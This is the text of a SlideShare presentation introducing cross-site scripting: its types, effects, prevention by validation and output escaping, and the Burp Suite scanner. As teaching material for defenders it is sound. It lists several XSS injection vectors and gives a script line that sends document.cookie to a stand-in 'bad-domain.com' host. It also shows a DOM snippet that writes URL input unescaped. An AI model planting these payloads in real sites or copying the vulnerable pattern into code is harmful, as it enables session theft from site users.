SlideShare a Scribd company logo
Cross Site Scripting
(XSS)
by Irfad Imtiaz
What is XSS
Cross Site Scripting
XSS is a vulnerability which when present in
websites or web applications, allows malicious
users (Hackers) to insert their client side
code (normally JavaScript) in those web
pages. When this malicious code along with
the original webpage gets displayed in the
web client (browsers like IE, Mozilla etc),
allows Hackers to gain greater access of
XSS (-ve) effects
● stealing other user’s cookies
● stealing their private information
● performing actions on behalf of
other users
● redirecting to other websites
● Showing ads in hidden IFRAMES
and pop-ups       
How XSS works
Web server gets data from web client
(POST, GET, COOKIES etc) with the
request. So a malicious User can
include client side code snippets
(JavaScript) into the data. For example :
 
Amit<script>alert (‘this site
has been hacked’) ;</script>
XSS input
Note: This image has been created using Firebug and this XSS hole is not present in
google.com
XSS contd.
● Let’s assume Web server performs no
validation or filtration on this data.
● Now web server either saves this data +
XSS code to some persistent storage
(like database) or print this data back in
the HTML.
● When this XSS code, comes from server
along with HTML into the web client
XSS
Server
Hacker’s
Browser
http request
with XSS
JavaScript
Hacker’s
Browser
http response with
XSS JavaScript
XSS output
Note: This image has been created using Firebug and this XSS hole is not present in
google.com
XSS vectors
● <SCRIPT SRC=http://ha.ckers.org/xss.
js></SCRIPT>
● <IMG SRC=javascript:alert('XSS')>
● <IMG SRC=javascript:alert(&quot;XSS&quot;)>
● <IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
● <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
● <IMG SRC=javascript:alert(String.
fromCharCode(88,83,83))>
● <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;
&#114;&#105;&#112;&#116;&#58;&#97;&#108;
&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;
&#39;&#41;>
Type of XSS attacks
● Non-persistent
● Persistent
● DOM Based
Non-persistent
When XSS code only gets displayed in the next page
to the same user and not gets saved into persistent
storage like database. This type of attack is less
vulnerable, because Hacker can see only their own
cookies and can make modifications in their own
current opened pages. The risk with these kinds of
XSS holes is that it opens way for Cross Site
Request Forgery CSRF. CSRF allows a hacker to
place some links
Example : same as given previously to explain XSS 
CSRF
Cross-site request forgery
is a type of malicious exploit of a website whereby unauthorized
commands are transmitted from a user that the website trusts.
This can be done by placing some hidden links in some bad
website.
for example :
<img src="http://bank.example/withdraw?
account=bob<script>document.location=‘http://bad-domain.
com/store_data?cookie=‘ + document.cookie;</script>
CSRF
Bank Server
http response with CSRF
Link
Bad Server 1
Normal User’s
Browser
<img src="http://bank.
example/withdraw?
account=bob<script>d
ocument.location=
‘http://bad-domain.
com/store_data?
cookie=‘ + document.
cookie;</script>
Normal User’s
Browser
Bad Server 2
http response
with XSS
http request with
cookies
http request
with XSS
Persistent XSS
In persistent type of XSS attack, XSS code gets saved into
persistent storage like database with other data and then
it is visible to other users also. One example of this kind of
attacks is possible blog websites, where hacker can add their
XSS code along with the comment text and if no validation or
filtering is present on the server, XSS code can successfully
saved into the database. After this if anyone (other users)
open the page into their browsers, XSS code can execute and
can perform a variety of harmful actions. This type of attack is
more vulnerable, because Hacker can steal cookies and can
make modifications in the page. The risk with these kinds of
attacks is any third party hacker can use this vulnerability to
perform some actions on behalf of other users.
Persistent XSS – Step 1
Server
Hacker’s
Browser
http request
with XSS
JavaScript
Server saves XSS
code to DB
DB
Step 1
Persistent XSS – Step 2
Server
Hacker
Browser
http request
with XSS
JavaScript
Normal User
Browser
http response with
XSS JavaScript
DB
Step 2
Server saves XSS
code to DB
Persistent XSS
Note: This image has been created using Firebug and this XSS hole is not present in
blogger.com
DOM based attack
DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack
payload is executed as a result of modifying the DOM “environment” in the
victim’s browser used by the original client side script, so that the client
side code runs in an “unexpected” manner. That is, the page itself (the
HTTP response that is) does not change, but the client side code
contained in the page executes differently due to the malicious
modifications that have occurred in the DOM environment.
 
This is in contrast to other XSS attacks (stored or reflected), wherein the
attack payload is placed in the response page (due to a server side flaw).
 
Example
…
var pos = document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.
length));
Prevention
Never trust the
user input data
No matter where it’s coming from (
GET, POST, COOKIE etc.
Validation at client side
By performing client side (JavaScript) validation, before
submitting the data to server, helps only in usability aspect of the
website. It can’t provide any actual security, because user
can disable the JavaScript. Many JavaScript libraries and
frameworks are available for this.
For example in DOJO framework
 
<label for="firstName">First Name: </label>
<input type="text" id="firstName" name="firstName"
dojoType="dijit.form.ValidationTextBox"
required="true"
propercase="true"
promptMessage="Enter first name."
invalidMessage="First name is required."
trim="true”/><br>
Validation at server
By sanitizing the input data, we can
prevent the malicious code to enter in the
system.
Checking the proper data types helps in
cleaning the data. First of all we should
restrict numeric data for numeric fields and
only alphanumeric characters for text fields
 
White lists – Allow <strong>, <em> and
Escaping output at server
Problem characters can include < > " ‘  &.These
characters can be replaced with HTML character
entities.
For example, < can be replaced with &lt;.
 
5 Rules for escaping output
#1 - HTML Escape before inserting into element
content
#2 - Attribute Escape before inserting into
attributes
Escaping text before updating DOM at
client side
To avoid DOM based XSS attacks.
Web vulnerability scanner
Applications
These applications provide the developer
to test their web applications for
various types of vulnerabilities.
These applications allow navigating
through the web sites or web
applications and performing various
types of attacks (manual or automated).
Both free and commercial applications
Burp suite
● Burp suite allows an attacker to combine
manual and automated techniques to
enumerate, analyze, attack and exploit web
applications. The various burp tools work
together effectively to share information
and allow findings identified within one tool
to form the basis of an attack using
another.
● Download: http://portswigger.
Burp Tools
Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle
between the end browser and the target web application, allowing you to intercept,
inspect and modify the raw traffic passing in both directions.
Spider - an intelligent application-aware web spider which allows complete enumeration
of an application's content and functionality.
Scanner [Pro version only] - an advanced tool for performing automated discovery of
security vulnerabilities in web applications.
Intruder - a highly configurable tool for automating customized attacks against web
applications, such as enumerating identifiers, harvesting useful data, and fuzzing for
common vulnerabilities.
Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and
analyzing the application's responses.
Sequencer - a tool for analyzing the quality of randomness in an application's session
Burp Suite
How to use
● Run the application and set the browser
proxy to localhost: 8080
● Open any site and Burp will create a
sitemap tree in the left panel, as per the site
traversal.
● Select any URL from the tree and add it to
intruder.
● Add different type of payloads for attack, i.
e.
Questions
Refrences
● http://en.wikipedia.org
● http://ha.ckers.org/xss.html
● http://portswigger.net
Thank you
Stay Tuned
Stay Connected:
● Twitter.com/irfadimtiaz
● Facebook.com/irfadimtiaz
● slideshare.net/irfadimtiaz
● http://www.irfadimtiaz.com

More Related Content

PPTX
Cross Site Scripting
PPTX
Xss attack
PPTX
Cross Site Scripting (XSS)
PPT
Phishing attacks ppt
PPTX
OWASP Top 10 2021 What's New
PPT
Cookies and sessions
PPTX
Cross site scripting
PDF
Introduction to Web Application Penetration Testing
Cross Site Scripting
Xss attack
Cross Site Scripting (XSS)
Phishing attacks ppt
OWASP Top 10 2021 What's New
Cookies and sessions
Cross site scripting
Introduction to Web Application Penetration Testing

What's hot (20)

PPTX
Attacking thru HTTP Host header
PDF
Broken access controls
PPTX
SQL injection prevention techniques
PPTX
PPTX
Deep understanding on Cross-Site Scripting and SQL Injection
PDF
Broken access control
PPTX
Understanding Cross-site Request Forgery
PPT
Introduction to Web Server Security
PPTX
Vulnerabilities in modern web applications
PDF
PPTX
PPTX
Cross Site Scripting ( XSS)
PPTX
Sql injection
PPTX
Cross Site Scripting Defense Presentation
PPTX
Web Hacking With Burp Suite 101
PDF
Cross site scripting
PPTX
Web security
PPTX
Sql injection in cybersecurity
PPTX
DNS spoofing/poisoning Attack
PPT
Cross site scripting (xss)
Attacking thru HTTP Host header
Broken access controls
SQL injection prevention techniques
Deep understanding on Cross-Site Scripting and SQL Injection
Broken access control
Understanding Cross-site Request Forgery
Introduction to Web Server Security
Vulnerabilities in modern web applications
Cross Site Scripting ( XSS)
Sql injection
Cross Site Scripting Defense Presentation
Web Hacking With Burp Suite 101
Cross site scripting
Web security
Sql injection in cybersecurity
DNS spoofing/poisoning Attack
Cross site scripting (xss)
Ad

Viewers also liked (20)

PDF
Lawyer in Vietnam Oliver Massmann Trans Pacific Partnership Agreement - Ratif...
PDF
NVM Lensink Gussinklo Makelaardij Presentatie
PPT
100 Text Loans, Text Loans
PDF
د. فوزية اخضر - تطبيق تجربة مدرسة المستقبل الشاملة - المعرض والمنتدى الدولي ل...
PDF
World Economic Forum, la grande sciocchezza
PDF
Plan Social Media Wawawiwa Design
PPTX
Puppetのススメ
PPTX
Social by Design REMIXED by Geoff Colon
PDF
Páginas Israelíticas – 3 – Amar las almas y no llorar
PDF
Infoprop (1)
PPS
Buddhist Temple Dhammakaya Thai
PDF
Policy Paper ESCENARIOS PROSPECTIVOS DE LA SEGURIDAD EN COLOMBIA FRENTE AL PR...
PDF
Non-technical risks and their impact on mining - Trench, Sykes & Packey - Oct...
PPTX
Jill Watson Instructional Approaches that Set SLIFE up to succeed (and are go...
PDF
Tackling complexity in giant systems: approaches from several cloud providers
PDF
Annualcycles mensual
PDF
Rahoitusvoimala
PDF
Sexuality education in_europe
PPTX
Encuesta Bogotá Cómo Vamos - Fragmento Canal Capital y Sec. Cultura
DOCX
MUDE SUA VIDA! COMO ESTÁ A SUA SAÚDE?
Lawyer in Vietnam Oliver Massmann Trans Pacific Partnership Agreement - Ratif...
NVM Lensink Gussinklo Makelaardij Presentatie
100 Text Loans, Text Loans
د. فوزية اخضر - تطبيق تجربة مدرسة المستقبل الشاملة - المعرض والمنتدى الدولي ل...
World Economic Forum, la grande sciocchezza
Plan Social Media Wawawiwa Design
Puppetのススメ
Social by Design REMIXED by Geoff Colon
Páginas Israelíticas – 3 – Amar las almas y no llorar
Infoprop (1)
Buddhist Temple Dhammakaya Thai
Policy Paper ESCENARIOS PROSPECTIVOS DE LA SEGURIDAD EN COLOMBIA FRENTE AL PR...
Non-technical risks and their impact on mining - Trench, Sykes & Packey - Oct...
Jill Watson Instructional Approaches that Set SLIFE up to succeed (and are go...
Tackling complexity in giant systems: approaches from several cloud providers
Annualcycles mensual
Rahoitusvoimala
Sexuality education in_europe
Encuesta Bogotá Cómo Vamos - Fragmento Canal Capital y Sec. Cultura
MUDE SUA VIDA! COMO ESTÁ A SUA SAÚDE?
Ad

Similar to Introduction to Cross Site Scripting ( XSS ) (20)

PDF
xss-100908063522-phpapp02.pdf
PDF
Complete xss walkthrough
PDF
Xss 101 by-sai-shanthan
PPTX
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
PDF
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
PPTX
Reflective and Stored XSS- Cross Site Scripting
PPTX
04. xss and encoding
PDF
Session7-XSS & CSRF
PDF
SeanRobertsThesis
PDF
The Cross Site Scripting Guide
PPT
CROSS SITE SCRIPTING.ppt
PDF
XSS-Alert-Pentration testing tool
PPTX
Secure Code Warrior - Cross site scripting
PPTX
15 owasp top 10 - a3-xss
PPTX
Understanding dom based xss
PPTX
Web application attacks
PPT
Intro to Web Application Security
PDF
XSS.pdf
PDF
XSS.pdf
xss-100908063522-phpapp02.pdf
Complete xss walkthrough
Xss 101 by-sai-shanthan
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
Reflective and Stored XSS- Cross Site Scripting
04. xss and encoding
Session7-XSS & CSRF
SeanRobertsThesis
The Cross Site Scripting Guide
CROSS SITE SCRIPTING.ppt
XSS-Alert-Pentration testing tool
Secure Code Warrior - Cross site scripting
15 owasp top 10 - a3-xss
Understanding dom based xss
Web application attacks
Intro to Web Application Security
XSS.pdf
XSS.pdf

Recently uploaded (20)

PPT
Teaching material agriculture food technology
PDF
Empathic Computing: Creating Shared Understanding
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Electronic commerce courselecture one. Pdf
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Machine learning based COVID-19 study performance prediction
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PDF
cuic standard and advanced reporting.pdf
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PPTX
MYSQL Presentation for SQL database connectivity
Teaching material agriculture food technology
Empathic Computing: Creating Shared Understanding
Dropbox Q2 2025 Financial Results & Investor Presentation
Electronic commerce courselecture one. Pdf
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Review of recent advances in non-invasive hemoglobin estimation
Machine learning based COVID-19 study performance prediction
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
gpt5_lecture_notes_comprehensive_20250812015547.pdf
cuic standard and advanced reporting.pdf
Digital-Transformation-Roadmap-for-Companies.pptx
Mobile App Security Testing_ A Comprehensive Guide.pdf
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
NewMind AI Weekly Chronicles - August'25-Week II
Assigned Numbers - 2025 - Bluetooth® Document
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Unlocking AI with Model Context Protocol (MCP)
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Reach Out and Touch Someone: Haptics and Empathic Computing
MYSQL Presentation for SQL database connectivity

Introduction to Cross Site Scripting ( XSS )

  • 2. What is XSS Cross Site Scripting XSS is a vulnerability which when present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of
  • 3. XSS (-ve) effects ● stealing other user’s cookies ● stealing their private information ● performing actions on behalf of other users ● redirecting to other websites ● Showing ads in hidden IFRAMES and pop-ups       
  • 4. How XSS works Web server gets data from web client (POST, GET, COOKIES etc) with the request. So a malicious User can include client side code snippets (JavaScript) into the data. For example :   Amit<script>alert (‘this site has been hacked’) ;</script>
  • 5. XSS input Note: This image has been created using Firebug and this XSS hole is not present in google.com
  • 6. XSS contd. ● Let’s assume Web server performs no validation or filtration on this data. ● Now web server either saves this data + XSS code to some persistent storage (like database) or print this data back in the HTML. ● When this XSS code, comes from server along with HTML into the web client
  • 8. XSS output Note: This image has been created using Firebug and this XSS hole is not present in google.com
  • 9. XSS vectors ● <SCRIPT SRC=http://ha.ckers.org/xss. js></SCRIPT> ● <IMG SRC=javascript:alert('XSS')> ● <IMG SRC=javascript:alert(&quot;XSS&quot;)> ● <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> ● <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> ● <IMG SRC=javascript:alert(String. fromCharCode(88,83,83))> ● <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108; &#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83; &#39;&#41;>
  • 10. Type of XSS attacks ● Non-persistent ● Persistent ● DOM Based
  • 11. Non-persistent When XSS code only gets displayed in the next page to the same user and not gets saved into persistent storage like database. This type of attack is less vulnerable, because Hacker can see only their own cookies and can make modifications in their own current opened pages. The risk with these kinds of XSS holes is that it opens way for Cross Site Request Forgery CSRF. CSRF allows a hacker to place some links Example : same as given previously to explain XSS 
  • 12. CSRF Cross-site request forgery is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. This can be done by placing some hidden links in some bad website. for example : <img src="http://bank.example/withdraw? account=bob<script>document.location=‘http://bad-domain. com/store_data?cookie=‘ + document.cookie;</script>
  • 13. CSRF Bank Server http response with CSRF Link Bad Server 1 Normal User’s Browser <img src="http://bank. example/withdraw? account=bob<script>d ocument.location= ‘http://bad-domain. com/store_data? cookie=‘ + document. cookie;</script> Normal User’s Browser Bad Server 2 http response with XSS http request with cookies http request with XSS
  • 14. Persistent XSS In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users.
  • 15. Persistent XSS – Step 1 Server Hacker’s Browser http request with XSS JavaScript Server saves XSS code to DB DB Step 1
  • 16. Persistent XSS – Step 2 Server Hacker Browser http request with XSS JavaScript Normal User Browser http response with XSS JavaScript DB Step 2 Server saves XSS code to DB
  • 17. Persistent XSS Note: This image has been created using Firebug and this XSS hole is not present in blogger.com
  • 18. DOM based attack DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.   This is in contrast to other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server side flaw).   Example … var pos = document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL. length));
  • 19. Prevention Never trust the user input data No matter where it’s coming from ( GET, POST, COOKIE etc.
  • 20. Validation at client side By performing client side (JavaScript) validation, before submitting the data to server, helps only in usability aspect of the website. It can’t provide any actual security, because user can disable the JavaScript. Many JavaScript libraries and frameworks are available for this. For example in DOJO framework   <label for="firstName">First Name: </label> <input type="text" id="firstName" name="firstName" dojoType="dijit.form.ValidationTextBox" required="true" propercase="true" promptMessage="Enter first name." invalidMessage="First name is required." trim="true”/><br>
  • 21. Validation at server By sanitizing the input data, we can prevent the malicious code to enter in the system. Checking the proper data types helps in cleaning the data. First of all we should restrict numeric data for numeric fields and only alphanumeric characters for text fields   White lists – Allow <strong>, <em> and
  • 22. Escaping output at server Problem characters can include < > " ‘ &.These characters can be replaced with HTML character entities. For example, < can be replaced with &lt;.   5 Rules for escaping output #1 - HTML Escape before inserting into element content #2 - Attribute Escape before inserting into attributes
  • 23. Escaping text before updating DOM at client side To avoid DOM based XSS attacks.
  • 24. Web vulnerability scanner Applications These applications provide the developer to test their web applications for various types of vulnerabilities. These applications allow navigating through the web sites or web applications and performing various types of attacks (manual or automated). Both free and commercial applications
  • 25. Burp suite ● Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. ● Download: http://portswigger.
  • 26. Burp Tools Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the end browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions. Spider - an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality. Scanner [Pro version only] - an advanced tool for performing automated discovery of security vulnerabilities in web applications. Intruder - a highly configurable tool for automating customized attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities. Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analyzing the application's responses. Sequencer - a tool for analyzing the quality of randomness in an application's session
  • 28. How to use ● Run the application and set the browser proxy to localhost: 8080 ● Open any site and Burp will create a sitemap tree in the left panel, as per the site traversal. ● Select any URL from the tree and add it to intruder. ● Add different type of payloads for attack, i. e.
  • 32. Stay Tuned Stay Connected: ● Twitter.com/irfadimtiaz ● Facebook.com/irfadimtiaz ● slideshare.net/irfadimtiaz ● http://www.irfadimtiaz.com